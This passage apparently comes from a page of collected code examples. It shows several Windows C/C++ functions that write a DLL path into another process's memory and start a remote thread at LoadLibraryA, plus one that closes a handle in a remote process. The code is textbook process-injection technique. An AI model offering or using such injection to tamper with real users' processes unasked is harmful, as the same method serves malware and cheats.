    wcscpy(dllPath + len, L"\\" DLL_NAME);

    WriteProcessMemory(proc, paramAddr, dllPath, 0x100, &bytesWritten);
    HANDLE thread = CreateRemoteThread(proc, NULL, 0, (LPTHREAD_START_ROUTINE)LoadLibrary, (LPVOID)paramAddr, 0, 0);
    if (procThread) 
    {
        ResumeThread(procThread);
    }
}
Esempio n. 27
0
BOOL CFileControlTool::CloseRemoteProcessHandle(DWORD dwProcessID,HANDLE hRemoteHandle)   
{   
	BOOL result = FALSE;
	HANDLE hRemoteThread = NULL;
	HMODULE hKernel32Module = NULL;
	HANDLE hTargetProcess = NULL;
	hTargetProcess = OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION|PROCESS_VM_WRITE|PROCESS_VM_READ,FALSE,dwProcessID);
	hKernel32Module = LoadLibrary(_T("kernel32.dll")); 

	if(hTargetProcess && hKernel32Module){
		hRemoteThread = CreateRemoteThread(hTargetProcess,0,0,(LPTHREAD_START_ROUTINE)GetProcAddress(hKernel32Module,"CloseHandle"),hRemoteHandle,0,NULL);
		if(hRemoteThread == NULL){
			result = FALSE;
			goto Error;
		}
		if(WaitForSingleObject(hRemoteThread,2000) == WAIT_OBJECT_0){
			result = TRUE;
		}else{
			result = FALSE;
		}
	}

Error:
	if(hRemoteThread){
		CloseHandle(hRemoteThread);
	}
	if(hTargetProcess){
		CloseHandle(hTargetProcess);
	}
	if(hKernel32Module){
		FreeLibrary(hKernel32Module);
	}
	return result; 
}
Esempio n. 28
0
void injectIntoProcess(int processId, char *dllInput)
{
	printf(" [WARN] inject mode, this is inherently risky\n");

	HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,processId);
	if (hProcess == NULL)
	{
		printf(" [FAIL] could not open process %04x\n",processId);
		return;
	}

	globalPid = processId;
	printf(" [INFO] injected into process %d\n",processId);

	SIZE_T bW = 0, bR = 0;
	printf(" [INFO] attempting to create data cave\n");
	LPVOID remoteMemory = VirtualAllocEx(hProcess,NULL,strlen(dllInput) + 1,MEM_COMMIT + MEM_RESERVE, PAGE_READWRITE);
	WriteProcessMemory(hProcess,(LPVOID )remoteMemory,dllInput,strlen(dllInput) + 1,&bW);

	HANDLE hKernel = LoadLibrary("kernel32.dll");
	LPVOID addrLoadLibrary = GetProcAddress( (HMODULE )hKernel, "LoadLibraryA");
	
	printf(" [INFO] trying to create a remote thread at %08x\n",(unsigned long )addrLoadLibrary);

	char *dllOutput = (char *)malloc(MAX_PATH);
	memset(dllOutput,0,MAX_PATH);
	ReadProcessMemory(hProcess,(LPCVOID )remoteMemory,dllOutput,MAX_PATH,&bR);

	printf(" [INFO] confirming process has cave with \"%s\"\n",dllOutput);
	free(dllOutput);

	if(globalWait)
	{
		printf(" [WAIT] press any key to create remote thread...\n");
		getc(stdin);
	}

	HANDLE threadId = CreateRemoteThread(hProcess,NULL,0,(LPTHREAD_START_ROUTINE )addrLoadLibrary,remoteMemory,NULL,NULL);
	if (threadId == NULL)
	{
		printf(" [INFO] could not create remote thread\n");
		return;
	}
	else
	{
		WaitForSingleObject(threadId, INFINITE);   //this waits untill thread thread has finished
		// VirtualFree(remoteMemory, 0, MEM_RELEASE); //free myFunc memory
		CloseHandle(threadId);
		CloseHandle(hProcess);
	 }

	printf(" [INFO] success!\n");

	if (globalPid != 0)
	{
		printf("\n\n - to connect to this process, use peek %d - \n\n", globalPid);
	}

	return;
}
Esempio n. 29
0
void InjectAntihack(HANDLE hProc)
{
	if (!hProc) throw std::exception("Invalid process handle");

	HMODULE hModule = GetModuleHandleA("kernel32.dll");
	if (!hModule) throw std::exception("Could not acquire module of kernel32.dll");

	FARPROC pLoadLibrary = GetProcAddress(hModule, "LoadLibraryA");
	if (!pLoadLibrary) throw std::exception("Could not acquire address of LoadLibraryA");

	const std::string dllName = "antihack.dll";
	int size = dllName.length()+1;

	void* pRemoteAddress = VirtualAllocEx(hProc, 0, size, MEM_COMMIT, PAGE_READWRITE);
	if (!pRemoteAddress) throw std::exception("Could not allocate remote memory");

	if ( !WriteProcessMemory(hProc, pRemoteAddress, (void*)dllName.c_str(), size, 0) )
		throw std::exception("Could not write remote string");

	HANDLE hThread = CreateRemoteThread(hProc, 0, 0, (LPTHREAD_START_ROUTINE)pLoadLibrary, pRemoteAddress, 0, 0);
	if (!hThread) throw std::exception("Could not start remote thread");

	WaitForSingleObject(hThread, INFINITE);
	DWORD dwExit = 0;
	GetExitCodeThread(hThread, &dwExit);

	if (!dwExit) throw std::exception("Error while loading remote dll");

	if ( !VirtualFreeEx(hProc, pRemoteAddress, size, MEM_DECOMMIT) )
		throw std::exception("Could not free remote memory");
}
Esempio n. 30
0
BOOL Inject(DWORD pID, const char * DLL_NAME) 
{ 
   HANDLE Proc; 
   HMODULE hLib; 
   char buf[50] = {0}; 
   LPVOID RemoteString, LoadLibAddy; 
   if(!pID) 
      return false; 
   Proc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pID); 
   if(!Proc) 
   { 
      sprintf(buf, "OpenProcess() failed: %d", GetLastError()); 
      //MessageBox(NULL, buf, "Loader", MB_OK); 
      printf(buf); 
      return false; 
   } 
    
   LoadLibAddy = (LPVOID)GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA"); 
   // Allocate space in the process for our DLL 
   RemoteString = (LPVOID)VirtualAllocEx(Proc, NULL, strlen(DLL_NAME), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE); 
   // Write the string name of our DLL in the memory allocated 
   WriteProcessMemory(Proc, (LPVOID)RemoteString, DLL_NAME, strlen(DLL_NAME), NULL); 
   // Load our DLL 
   CreateRemoteThread(Proc, NULL, NULL, (LPTHREAD_START_ROUTINE)LoadLibAddy, (LPVOID)RemoteString, NULL, NULL); 
   CloseHandle(Proc); 
   return true; 
}